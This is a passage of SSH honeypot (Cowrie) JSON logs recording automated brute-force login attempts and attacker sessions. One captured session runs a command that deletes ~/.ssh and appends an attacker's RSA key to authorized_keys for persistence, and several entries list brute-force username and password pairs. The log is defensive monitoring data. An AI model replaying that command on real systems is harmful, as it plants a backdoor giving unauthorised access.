92-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:35.920344Z","src_ip":"212.227.235.229","session":"18b098a3c7fc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:24:36.943319Z","src_ip":"212.227.235.229","session":"18b098a3c7fc"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:37.186760Z","src_ip":"212.227.235.229","session":"081a85f7ca9b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:37.188641Z","src_ip":"212.227.235.229","session":"18b098a3c7fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42128,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e1ff2cf5939","protocol":"ssh","message":"New connection: 212.227.235.229:42128 (1.2.3.4:22) [session: 7e1ff2cf5939]","sensor":"my-vps","timestamp":"2025-08-26T13:24:41.821124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:24:41.821810Z","src_ip":"212.227.235.229","session":"7e1ff2cf5939"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:41.838913Z","src_ip":"212.227.235.229","session":"4a1b4340aaae"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:41.840666Z","src_ip":"212.227.235.229","session":"4a1b4340aaae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:24:42.066013Z","src_ip":"212.227.235.229","session":"7e1ff2cf5939"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:24:43.083326Z","src_ip":"212.227.235.229","session":"7e1ff2cf5939"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:43.328675Z","src_ip":"212.227.235.229","session":"7e1ff2cf5939"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:24:43.336136Z","src_ip":"212.227.235.229","session":"7d150d930708"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57222,"dst_ip":"1.2.3.4","dst_port":22,"session":"8914bb8b931e","protocol":"ssh","message":"New connection: 212.227.235.229:57222 (1.2.3.4:22) [session: 8914bb8b931e]","sensor":"my-vps","timestamp":"2025-08-26T13:25:03.786443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:25:03.787359Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:25:04.039473Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin!@#","message":"login attempt [root/Admin!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:25:05.087661Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:25:05.598377Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:25:05.599444Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:25:05.600746Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:25:05.850754Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:25:06.507166Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:25:06.507878Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:25:06.737773Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:25:06.739044Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59091,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d31747bf56","protocol":"ssh","message":"New connection: 212.227.235.229:59091 (1.2.3.4:22) [session: 44d31747bf56]","sensor":"my-vps","timestamp":"2025-08-26T13:25:06.922363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:25:06.928897Z","src_ip":"212.227.235.229","session":"44d31747bf56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:25:07.130206Z","src_ip":"212.227.235.229","session":"44d31747bf56"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:25:07.933758Z","src_ip":"212.227.235.229","session":"44d31747bf56"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":38488,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a73449c9836","protocol":"ssh","message":"New connection: 167.99.49.89:38488 (1.2.3.4:22) [session: 4a73449c9836]","sensor":"my-vps","timestamp":"2025-08-26T13:25:08.838920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:25:08.839936Z","src_ip":"167.99.49.89","session":"4a73449c9836"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:25:08.929603Z","src_ip":"167.99.49.89","session":"4a73449c9836"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:25:09.134164Z","src_ip":"212.227.235.229","session":"44d31747bf56"}
{"eventid":"cowrie.login.failed","username":"visitante","password":"visitante","message":"login attempt [visitante/visitante] failed","sensor":"my-vps","timestamp":"2025-08-26T13:25:09.328865Z","src_ip":"167.99.49.89","session":"4a73449c9836"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60807,"dst_ip":"1.2.3.4","dst_port":22,"session":"75feb13a73cb","protocol":"ssh","message":"New connection: 212.227.235.229:60807 (1.2.3.4:22) [session: 75feb13a73cb]","sensor":"my-vps","timestamp":"2025-08-26T13:25:09.364255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:25:09.365195Z","src_ip":"212.227.235.229","session":"75feb13a73cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:25:09.584348Z","src_ip":"212.227.235.229","session":"75feb13a73cb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:25:10.420757Z","src_ip":"167.99.49.89","session":"4a73449c9836"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:25:10.525235Z","src_ip":"212.227.235.229","session":"75feb13a73cb"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:25:10.743246Z","src_ip":"212.227.235.229","session":"8914bb8b931e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:25:10.744366Z","src_ip":"212.227.235.229","session":"75feb13a73cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48950,"dst_ip":"1.2.3.4","dst_port":22,"session":"83150aae7b81","protocol":"ssh","message":"New connection: 212.227.235.229:48950 (1.2.3.4:22) [session: 83150aae7b81]","sensor":"my-vps","timestamp":"2025-08-26T13:25:40.143667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:25:40.144863Z","src_ip":"212.227.235.229","session":"83150aae7b81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:25:40.383587Z","src_ip":"212.227.235.229","session":"83150aae7b81"}
{"eventid":"cowrie.login.failed","username":"mostafa","password":"mostafa","message":"login attempt [mostafa/mostafa] failed","sensor":"my-vps","timestamp":"2025-08-26T13:25:42.011041Z","src_ip":"212.227.235.229","session":"83150aae7b81"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":53506,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcc8f24b19ca","protocol":"ssh","message":"New connection: 167.99.49.89:53506 (1.2.3.4:22) [session: bcc8f24b19ca]","sensor":"my-vps","timestamp":"2025-08-26T13:26:08.290653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:26:08.293838Z","src_ip":"167.99.49.89","session":"bcc8f24b19ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:26:08.383440Z","src_ip":"167.99.49.89","session":"bcc8f24b19ca"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123","message":"login attempt [test1/123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:26:08.744798Z","src_ip":"167.99.49.89","session":"bcc8f24b19ca"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:26:09.836983Z","src_ip":"167.99.49.89","session":"bcc8f24b19ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:26:14.326342Z","src_ip":"176.65.149.186","session":"fdbffe289dcb"}
{"eventid":"cowrie.session.closed","duration":180.07149696350098,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:26:14.331593Z","src_ip":"176.65.149.186","session":"fdbffe289dcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34584,"dst_ip":"1.2.3.4","dst_port":22,"session":"acf1c2fa399d","protocol":"ssh","message":"New connection: 212.227.235.229:34584 (1.2.3.4:22) [session: acf1c2fa399d]","sensor":"my-vps","timestamp":"2025-08-26T13:26:56.980438Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:26:56.981505Z","src_ip":"212.227.235.229","session":"acf1c2fa399d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34982,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae43759f0b2d","protocol":"ssh","message":"New connection: 212.227.235.229:34982 (1.2.3.4:22) [session: ae43759f0b2d]","sensor":"my-vps","timestamp":"2025-08-26T13:26:57.134953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:26:57.135732Z","src_ip":"212.227.235.229","session":"ae43759f0b2d"}
